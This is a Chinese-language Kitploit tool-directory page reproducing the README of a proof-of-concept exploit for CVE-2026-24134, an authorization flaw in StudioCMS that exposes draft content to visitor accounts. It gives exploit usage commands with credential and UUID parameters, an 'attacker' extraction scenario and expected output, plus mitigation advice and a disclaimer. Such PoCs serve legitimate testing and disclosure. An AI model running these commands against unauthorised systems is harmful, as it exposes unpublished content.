Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/filipegaudard/cve-2026-24134-poc
漏洞分析漏洞利用Web应用程序漏洞利用API安全测试渗透测试学习与教育
GitHubfilipegaudard/cve-2026-24134-poc

CVE-2026-24134-PoC

针对 CVE-2026-24134 的概念验证漏洞利用程序,该漏洞是 StudioCMS 中的一个对象级授权失效(BOLA)漏洞,用于演示对草稿内容的未授权访问。

查看仓库
6个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-24134-PoC

概述

本仓库包含 CVE-2026-24134 的概念验证(PoC),这是 StudioCMS 中的一个对象级授权失效(BOLA)漏洞。

内容

  • cve_2026_24134_poc.py - Python 利用脚本

前置条件

  • StudioCMS<=0.1.1
root@kitploit:~
pip install requests colorama

快速开始

手动利用

root@kitploit:~
# 基本用法
python3 cve_2026_24134_poc.py \
  -u http://localhost:4321 \
  --username visitor_user \
  --password visitor_pass \
  --uuid bad87630-69a4-4cd6-bcb2-6965839dc148

# 将输出保存到文件
python3 cve_2026_24134_poc.py \
  -u http://localhost:4321 \
  --username visitor_user \
  --password visitor_pass \
  --uuid bad87630-69a4-4cd6-bcb2-6965839dc148 \
  --save

自动化测试

root@kitploit:~
python3 cve_2026_24134_poc.py \
  -u http://localhost:4321 \
  --auto-test \
  --visitor-user visitor01 \
  --visitor-pass visitorpass \
  --editor-user editor01 \
  --editor-pass editorpass \
  --uuid bad87630-69a4-4cd6-bcb2-6965839dc148

参数

必需参数

  • -u, --url - 目标 StudioCMS 基础 URL
  • --uuid - 目标草稿内容 UUID

手动模式

  • --username - 用于身份验证的用户名
  • --password - 用于身份验证的密码

自动化测试模式

  • --auto-test - 启用自动化测试
  • --visitor-user - 访客账户用户名
  • --visitor-pass - 访客账户密码
  • --editor-user - 编辑账户用户名
  • --editor-pass - 编辑账户密码

可选参数

  • --save - 将响应内容保存到文件
  • --no-ssl-verify - 禁用 SSL 证书验证

示例场景

场景 1:测试系统是否存在漏洞

root@kitploit:~
python3 cve_2026_24134_poc.py \
  --url http://target.com \
  --auto-test \
  --visitor-user test_visitor \
  --visitor-pass SecurePass123! \
  --editor-user test_editor \
  --editor-pass SecurePass456! \
  --uuid 12345678-1234-1234-1234-123456789abc

存在漏洞时的预期输出:

root@kitploit:~
[+] Successfully authenticated as test_visitor
[*] Detected user role: Visitor
[+] Successfully accessed draft content!
[!] VULNERABILITY CONFIRMED!

已修复时的预期输出:

root@kitploit:~
[+] Successfully authenticated as test_visitor
[*] Detected user role: Visitor
[*] Access denied (403 Forbidden)
[+] VULNERABILITY NOT PRESENT

场景 2:提取草稿内容

root@kitploit:~
python3 cve_2026_24134_poc.py \
  --url http://localhost:4321 \
  --username attacker \
  --password pass123 \
  --uuid target-uuid-here \
  --save

这将把完整的草稿内容保存到 draft_{uuid}.html。

理解输出

成功指示符

  • [+] - 操作成功(绿色)
  • [*] - 信息性消息(蓝色)
  • [!] - 警告(黄色)
  • [-] - 错误(红色)

HTTP 状态码

  • 200 OK - 存在漏洞!已访问草稿内容
  • 403 Forbidden - 已修复!已实施正确的授权机制
  • 404 Not Found - UUID 无效或安全实现(返回 404 而非暴露存在性)
  • 401 Unauthorized - 身份验证失败

缓解措施

如果您正在运行存在漏洞的 StudioCMS 版本,请立即更新到已修复的版本。

对于开发者

真正的问题: 授权检查是在客户端(JavaScript)执行的,而非服务端。

根据开发团队的说法:

"目前用于重定向的等级检查是在客户端 JS 中完成的,本应在不久之后被替换。"

修复方案: 将授权从客户端移至服务端。

关键原则: 永远不要信任客户端。客户端安全 = 用户体验增强。服务端安全 = 真正的保护。

法律免责声明

重要提示: 本工具仅用于教育和授权的安全测试目的。

  • 仅可对您拥有或已获得明确书面许可的系统进行测试
  • 在大多数司法管辖区,未经授权访问计算机系统属于违法行为
  • 作者对滥用本工具不承担任何责任
  • 始终遵循负责任披露实践

参考

  • CVE: CVE-2026-24134
  • CVSS: 6.5 高危
  • CWE: CWE-639
  • OWASP: API1:2023 - 对象级授权失效

联系方式

如有关于此 PoC 或漏洞的问题:

  • 作者: Filipe Gaudard

许可证

此 PoC 仅用于教育目的发布。请负责任且合乎道德地使用。

下载工具